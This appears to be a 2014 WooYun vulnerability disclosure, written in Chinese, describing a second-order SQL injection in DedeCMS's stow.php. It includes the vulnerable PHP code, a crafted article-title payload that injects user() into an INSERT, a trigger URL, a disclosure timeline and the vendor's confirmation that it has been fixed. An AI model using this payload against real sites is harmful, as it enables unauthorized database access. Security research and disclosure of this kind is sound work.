Dedecms 会员中心注入漏洞8(二次注入)

漏洞详情

披露状态:

2014-01-14: 细节已通知厂商并且等待厂商处理中
2014-01-14: 厂商已经确认,细节仅向厂商公开
2014-01-17: 细节向第三方安全合作伙伴开放
2014-01-24: 细节向核心白帽子及相关领域专家公开
2014-02-03: 细节向普通白帽子公开
2014-02-23: 细节向实习白帽子公开
2014-04-14: 细节向公众公开

简要描述:

Dedecms 会员中心注入漏洞8(二次注入)
吃了个饭 继续挖
哈哈 其实不是会员中心的 但是和会员中心有关,标题为了统一就这么写了

详细说明:

/plus/stow.php
if($type=='')
{
$row = $dsql->GetOne("SELECT * FROM `#@__member_stow` WHERE aid='$aid'

AND mid='{$ml->M_ID}'");
if(!is_array($row))
{
$dsql->ExecuteNoneQuery("INSERT INTO `#@__member_stow`

(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".addslashes

($arctitle)."','$addtime'); ");
} else {
ShowMsg('您已经成功收藏该内容,无需重复收

藏!','javascript:window.close();');
exit();
}
} else {
$row = $dsql->GetOne("SELECT * FROM `#@__member_stow` WHERE

type='$type' AND (aid='$aid' AND mid='{$ml->M_ID}')");
if(!is_array($row))
{
$dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`

(mid,aid,title,addtime,type) VALUES ('".$ml-

>M_ID."','$aid','$title','$addtime','$type'); ");//这里的TITLE是从数据库里

查询出来的,也就是我们发布的文章的标题
}

漏洞证明:

那么soeasy 我们发布一个文章

http://127.0.0.1/dede/member/content_list.php?channelid=1 打开这里发布

文章标题写上 1111',1,2),(8,136,user(),1,2),(1,2,'3

其他随意

然后提交

完了之后查看一下文章的ID

在打开http://127.0.0.1/dede/plus/stow.php?aid=137&type=11%27

把137改成你的文章ID就哦了

QQ截图20140114181557.png

3.png

2.png



5.png

修复方案:

你猜啊

版权声明:转载请注明来源 Matt@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-01-14 22:24

厂商回复:

已修复,感谢反馈

最新状态:

暂无


漏洞评价: